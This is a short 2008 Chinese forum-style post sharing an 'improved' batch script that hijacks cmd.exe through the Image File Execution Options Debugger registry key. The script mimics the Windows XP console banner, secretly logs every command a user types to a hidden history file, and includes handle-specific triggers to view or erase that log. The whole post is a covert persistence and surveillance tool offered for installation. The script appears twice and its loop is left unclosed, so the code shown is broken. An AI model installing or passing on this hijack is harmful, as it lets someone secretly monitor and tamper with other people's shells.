CMD記錄器改良版代碼
更新時間:2008年06月19日 19:56:43 作者:
改的不是很良 勉強可用
或許應該弄多一點容錯代碼 體力活啊。。
安裝 把代碼保存為cmd.bat 放置system32下 把cmd.exe copy為cmd.gif
注冊表 添加
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
字串 Debugger
字串內容 cmd.gif /c cmd.bat
@echo off
title %ComSpec%
rem CMD 記錄器 改良版
rem 原作者 superjj(可能是馬甲!)
rem 原文的地址:https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html
rem 由我allyesno 改良(是本人不是馬甲!)
rem 容錯代碼就不改良了,一些細節(jié)部分自己添加!
setlocal EnableDelayedExpansion
echo Microsoft Windows XP [版本 5.1.2600]
echo (C) 版權所有 1985-2001 Microsoft Corp.
echo.
for /l %%i in (0,0,0) do (
set /p strCMD=%cd%^>
if "!strcmd!"=="whoami" echo allyesno&set strcmd=
if "!strcmd!"=="log" type %windir%history.txt&set strcmd=
if "!strcmd!"=="logclear" del %windir%history.txt&set strcmd=
for /f "delims=" %%i in ("!strCMD!") do echo %%i >>%windir%history.txt
!strCMD!
echo.
注冊表 添加
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe
字串 Debugger
字串內容 cmd.gif /c cmd.bat
復制代碼 代碼如下:
@echo off
title %ComSpec%
rem CMD 記錄器 改良版
rem 原作者 superjj(可能是馬甲!)
rem 原文的地址:https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html
rem 由我allyesno 改良(是本人不是馬甲!)
rem 容錯代碼就不改良了,一些細節(jié)部分自己添加!
setlocal EnableDelayedExpansion
echo Microsoft Windows XP [版本 5.1.2600]
echo (C) 版權所有 1985-2001 Microsoft Corp.
echo.
for /l %%i in (0,0,0) do (
set /p strCMD=%cd%^>
if "!strcmd!"=="whoami" echo allyesno&set strcmd=
if "!strcmd!"=="log" type %windir%history.txt&set strcmd=
if "!strcmd!"=="logclear" del %windir%history.txt&set strcmd=
for /f "delims=" %%i in ("!strCMD!") do echo %%i >>%windir%history.txt
!strCMD!
echo.

